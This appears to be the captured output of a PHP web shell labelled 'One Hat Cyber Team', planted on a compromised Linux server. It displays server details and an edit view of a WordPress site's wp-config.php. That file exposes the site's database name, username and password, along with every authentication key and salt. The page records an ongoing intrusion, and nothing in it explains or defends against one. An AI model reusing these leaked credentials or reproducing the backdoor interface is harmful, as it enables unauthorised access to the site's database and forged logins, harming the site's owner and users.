⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.231
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
vhosts
/
raqmix.net
/
moh.raqmix.net
/
Edit File: wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'raqmix_moh' ); /** Database username */ define( 'DB_USER', 'raqmix_moh' ); /** Database password */ define( 'DB_PASSWORD', 'CzSqM3ewyq7un2!&' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'YBDO+oT/U1zh8KU7@3)w00%cZ8D4:sH!W99C4NaQ_~4LFF0:a~N7vEa+d*3+QL(A'); define('SECURE_AUTH_KEY', 'Z82rJy3x5v327f34haj40_IJ5(6J)0:q7u8puBC]3ruBIwLY12T_E3Lww35vR[Uo'); define('LOGGED_IN_KEY', 'FS5d(&487U6YDH60Z*OBn4l(DO6(cVK;NkaP3lsKx~de!WDco1fCnG2xAe0E5khY'); define('NONCE_KEY', '1)x&5tY*p8|7:#Xn6JsR1v:7%BT52k6Hl*3zUO%3x1EJQm/[:T*-atcTAp640tj4'); define('AUTH_SALT', 'Bx32JV70C2w4D7CQ2c~88A2l[;pkukO]5U(BsP:cUg11W4%[+4R~4@E;3#QcGp25'); define('SECURE_AUTH_SALT', 'L7zd!3-!1Pj6~8iU)(0V5OcpAd2][gPf7R49#17V3b4]I_fuCiI/X8|pj4@pFC7x'); define('LOGGED_IN_SALT', 'ued#]%S4&92Yj0l_g/d9m9XSR8p;R:-*e05!93RvBP0S;)2&MK%X9Fu66yiIvLQ0'); define('NONCE_SALT', 'zl#SVj054-5[)jw;n6E116/:%h(]j*9n3;X19#AVb~28|227F7;&jqA)4!9@4T_@'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'moh_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); define('WP_AUTO_UPDATE_CORE', false); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'DISABLE_WP_CRON', true ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan